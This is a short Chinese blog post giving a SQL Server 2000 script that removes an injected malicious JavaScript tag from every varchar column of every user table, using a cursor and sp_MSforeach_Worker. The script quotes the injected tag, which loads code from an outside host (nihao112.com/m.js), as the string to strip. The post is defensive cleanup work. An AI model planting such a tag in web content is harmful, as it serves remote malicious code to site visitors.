本文提供了一种针对SQL Server 2000数据库中被植入JS恶意代码的情况下的批量清除方法。通过使用sp_MSforeach_Worker存储过程,可以有效地遍历所有用户表并替换掉包含特定恶意JS代码的内容。
最近发现好多兄弟网站都被qj了, 数据库中被植入js,贴个批量清除的方法[*仅限SQL2000];sp_MSforeach_Worker 的用法及结构详见http://blog.youkuaiyun.com/abandonship/archive/2008/06/06/2515884.aspx
DECLARE @fieldtype sysname
SET @fieldtype='varchar'
--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script src=http://www.nihao112.com/m.js></script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
